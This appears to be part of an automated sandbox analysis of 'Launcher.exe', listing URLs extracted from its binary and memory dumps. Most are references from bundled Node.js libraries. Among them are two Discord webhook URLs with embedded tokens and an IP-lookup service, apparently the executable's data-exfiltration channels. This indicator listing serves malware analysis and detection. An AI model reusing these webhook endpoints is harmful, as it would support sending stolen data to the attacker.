        Source: Launcher.exe, 00000000.00000003.1265642804.00000175262C2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1258032982.000001752630E000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1247222794.0000030CA43C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1252239907.00000175260C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ecma-international.org/ecma-262/5.1/#sec-8.6)
        Source: Launcher.exe, 00000000.00000003.1279400682.0000017526527000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.0000017526508000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1280117601.000001752613D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1271970158.0000017526311000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1279400682.0000017526513000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1278601726.000001752613D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1269086365.0000017526259000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1376078593.00000238E3701000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1263859676.00000175260F9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.00000175264FC000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1394795834.00000066CD801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.ecma-international.org/ecma-262/7.0/#sec-ecmascript-language-types)
        Source: Launcher.exe, 00000000.00000003.1231112083.000001752607D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1231112083.000001752614F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com)
        Source: Launcher.exe, 00000000.00000003.1530846422.00000175265C8000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1566779691.00000175265D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ietf.org/rfc/rfc2315.txt):
        Source: Launcher.exe, 00000000.00000003.1511405754.000003887EDC1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1512804492.00000198A0801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.jsfromhell.com)
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.midnight-commander.org/browser/lib/tty/key.c
        Source: Launcher.exe, 00000000.00000003.1533437253.0000017526415000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1530651360.000000017A6C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.netdealing.com
        Source: Launcher.exe, 00000000.00000003.1520593672.0000017526115000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1510412634.0000020C2CC41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1523795672.00000175262A7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1523795672.00000175262BB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1511405754.000003887EDC1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1533904020.0000002D2C9C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1515621239.000001752618F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org
        Source: Launcher.exe, 00000000.00000003.1530651360.000000017A6C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/docs/crypto/EVP_BytesToKey.html
        Source: Launcher.exe, 00000000.00000003.1537773023.00000175261C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rsa.com/rsalabs/node.asp?id=2125
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.squid-cache.org/Doc/config/half_closed_clients/
        Source: Launcher.exe, 00000000.00000003.1273115219.0000017526217000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1257176949.0000017526217000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.syskall.com)
        Source: Launcher.exe, 00000000.00000003.1533437253.0000017526415000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1530651360.000000017A6C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.tero.co.uk/des/
        Source: Launcher.exe, 00000000.00000003.1515621239.00000175261C1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1519009101.00000175265C6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1511405754.000003887EDC1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1512804492.00000198A0801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winternet.no)
        Source: Launcher.exe, 00000000.00000003.1227628748.0000017526112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
        Source: Launcher.exe, 00000000.00000003.1542759857.0000017526156000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400357051.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://app.fossa.io/api/projects/git%2Bhttps%3A%2F%2Fgithub.com%2Fmapbox%2Fnode-sqlite3.svg?type=la
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://app.fossa.io/api/projects/git%2Bhttps%3A%2F%2Fgithub.com%2Fmapbox%2Fnode-sqlite3.svg?type=sh
        Source: Launcher.exe, 00000000.00000003.1542759857.0000017526156000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400357051.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://app.fossa.io/projects/git%2Bhttps%3A%2F%2Fgithub.com%2Fmapbox%2Fnode-sqlite3?ref=badge_large
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://app.fossa.io/projects/git%2Bhttps%3A%2F%2Fgithub.com%2Fmapbox%2Fnode-sqlite3?ref=badge_shiel
        Source: Launcher.exe, 00000000.00000003.1284664317.0000017526287000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1284664317.000001752628B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1365774806.0000020D192C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://archiverjs.com/zip-stream/ZipStream.html
        Source: Launcher.exe, 00000000.00000003.1227628748.0000017526112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://axios-http.com
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=10201
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=745678
        Source: Launcher.exe, 00000000.00000003.1249845254.0000017526295000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1258032982.000001752630E000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1247222794.0000030CA43C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1254540287.00000175260CD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1252239907.00000175260C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://camo.githubusercontent.com/6bbd36f4cf5b35a0f11a96dcd2e97711ffc2fb37/68747470733a2f2f662e636c
        Source: Launcher.exe, 00000000.00000003.1262296562.000001752629F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1249845254.0000017526295000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1258032982.000001752630E000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1247222794.0000030CA43C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1254540287.00000175260CD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1252239907.00000175260C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://camo.githubusercontent.com/f4810e00e1c5f5f8addbe3e9f49064fd5d102699/68747470733a2f2f662e636c
        Source: Launcher.exe, 00000000.00000003.1316755134.000001752613D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1331721960.0000017526164000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1276863550.0000017526165000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1299535994.000001752615D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1227628748.0000017526166000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1263859676.0000017526165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://canary.discord.com/api/webhooks/1276788778043965460/Orf3jKknL6GAnLBbxaHKrGxT9G-fuDkG7Pp9Ks25
        Source: Launcher.exe, 00000000.00000003.1252239907.00000175260B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://caolan.github.io/async/
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=25916
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#clear
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#console-namespace
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count-map
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#countreset
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#table
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://coolaj86.com/articles/building-sqlcipher-for-node-js-on-raspberry-pi-2/).
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://crbug.com/v8/7848
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d
        Source: Launcher.exe, 00000000.00000003.1532045265.0000012F66401000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc7468#section-7
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/SpiderMonkey/Parser_API
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/PerformanceResourceTiming
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Equality_comparisons_and_sameness#Loose_equa
        Source: Launcher.exe, 00000000.00000003.1259708993.00000175264AA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.00000175264AA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1271970158.0000017526383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith
        Source: Launcher.exe, 00000000.00000003.1259708993.00000175264AA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.00000175264AA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1271970158.0000017526383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/includes
        Source: Launcher.exe, 00000000.00000003.1259708993.00000175264AA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.00000175264AA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1271970158.0000017526383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/startsWith
        Source: Launcher.exe, 00000000.00000003.1265642804.00000175262C2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1249845254.0000017526295000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1258032982.000001752630E000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1247222794.0000030CA43C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/async_function
        Source: Launcher.exe, 00000000.00000003.1227628748.0000017526166000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1263859676.0000017526165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1276677347420143668/aMHlm0o0ZhGtCul2q9gome8sh0haDj4SJnUPs-KPbbe-9TU
        Source: Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://electronjs.org/headers
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://encoding.spec.whatwg.org
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textdecoder
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textencoder
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://esdiscuss.org/topic/isconstructor#content-11
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#fetch-timing-info
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400357051.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ghost.org).
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://gist.github.com/XVilka/8346728#gistcomment-2823421
        Source: Launcher.exe, 00000000.00000003.1348076606.0000017525D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/
        Source: Launcher.exe, 00000000.00000003.1510064798.00000105F8509000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ChALkeR
        Source: Launcher.exe, 00000000.00000003.1510064798.00000105F8509000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ChALkeR/safer-buffer.git
        Source: Launcher.exe, 00000000.00000003.1510064798.00000105F8509000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ChALkeR/safer-buffer/issues
        Source: Launcher.exe, 00000000.00000003.1510064798.00000105F8509000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ChALkeRX
        Source: Launcher.exe, 00000000.00000003.1227628748.0000017526112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/DigitalBrainJS)
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400357051.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Mithgol)
        Source: Launcher.exe, 00000000.00000003.1566779691.00000175265CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/RyanZim/universalify#readme
        Source: Launcher.exe, 00000000.00000003.1566779691.00000175265CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/RyanZim/universalify.git
        Source: Launcher.exe, 00000000.00000003.1566779691.00000175265CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/RyanZim/universalify/issues
        Source: Launcher.exe, 00000000.00000003.1273115219.0000017526227000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1275681448.0000017526227000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1273115219.000001752622B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/node-graceful-fs/issues/4
        Source: Launcher.exe, 00000000.00000003.1227628748.0000017526112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jasonsaayman)
        Source: Launcher.exe, 00000000.00000003.1370791140.000003E4F2D41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1321060699.000001752667A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jcrugzz)
        Source: Launcher.exe, 00000000.00000003.1370791140.000003E4F2D41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jcrugzz)js
        Source: Launcher.exe, 00000000.00000003.1275681448.00000175261D1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1261532478.00000175261D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jonschlinkert)
        Source: Launcher.exe, 00000000.00000003.1275681448.00000175261F1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1275681448.00000175261D1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1261532478.00000175261D1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1261532478.00000175261F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jonschlinkert/normalize-path
        Source: Launcher.exe, 00000000.00000003.1275681448.00000175261D1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1261532478.00000175261D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jonschlinkert/normalize-path/issues
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/joyent/node/issues/3295.
        Source: Launcher.exe, 00000000.00000003.1238316997.00000175261AB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1233378920.00000175261AB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1237502871.00000175260E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/joyent/node/issues/7819
        Source: Launcher.exe, 00000000.00000003.1376098895.000002F972B41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1394795834.00000066CD801000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1273115219.0000017526243000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jpommerening/node-lazystream
        Source: Launcher.exe, 00000000.00000003.1376098895.000002F972B41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1394795834.00000066CD801000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1273115219.0000017526243000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jpommerening/node-lazystream.git
        Source: Launcher.exe, 00000000.00000003.1376098895.000002F972B41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1394795834.00000066CD801000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1273115219.0000017526243000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jpommerening/node-lazystream/issues
        Source: Launcher.exe, 00000000.00000003.1566779691.00000175265FC000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1566779691.0000017526604000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1557876754.00000175264D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jprichardson/node-fs-extra/issues/269
        Source: Launcher.exe, 00000000.00000003.1256384195.0000017526265000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/juliangruber/balanced-match
        Source: Launcher.exe, 00000000.00000003.1392827074.000000426BF01000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/juliangruber/brace-expansion
        Source: Launcher.exe, 00000000.00000003.1262296562.000001752628F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1269086365.000001752628F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/juliangruber/isarray
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400357051.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1347810479.0000017526112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/kewde)
        Source: Launcher.exe, 00000000.00000003.1537773023.00000175261C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/kjur/jsjws/blob/master/rsa.js:
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400357051.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/kkaefer)
        Source: Launcher.exe, 00000000.00000003.1565501812.00000175261E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/kripken/emscripten/issues/5820
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/libuv/libuv/pull/1501.
        Source: Launcher.exe, 00000000.00000003.1372258204.000000E02B141000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmp, Launcher.exe, 00000000.00000003.1371928022.0000014E56B81000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1323720251.0000017526283000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.00000175264CF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1394795834.00000066CD801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/end-of-stream
        Source: Launcher.exe, 00000000.00000003.1372258204.000000E02B141000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1371928022.0000014E56B81000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1323720251.0000017526283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/end-of-stream/issues
        Source: Launcher.exe, 00000000.00000003.1371928022.0000014E56B81000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1326595872.000001752627F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1346219788.000001752627F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/fs-constants
        Source: Launcher.exe, 00000000.00000003.1371928022.0000014E56B81000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1326595872.000001752627F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1346219788.000001752627F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/fs-constants.git
        Source: Launcher.exe, 00000000.00000003.1371928022.0000014E56B81000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/fs-constants.gitA
        Source: Launcher.exe, 00000000.00000003.1371928022.0000014E56B81000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1326595872.000001752627F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1346219788.000001752627F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/fs-constants/issues
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmp, Launcher.exe, 00000000.00000003.1274536997.00000175264EC000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1277593652.00000175264D4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1394795834.00000066CD801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/pump
        Source: Launcher.exe, 00000000.00000003.1369452048.0000019773B01000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1323720251.00000175262D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/tar-stream
        Source: Launcher.exe, 00000000.00000003.1369452048.0000019773B01000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/tar-stream.git
        Source: Launcher.exe, 00000000.00000003.1369452048.0000019773B01000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/tar-stream.gitA
        Source: Launcher.exe, 00000000.00000003.1369452048.0000019773B01000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/tar-stream/issues
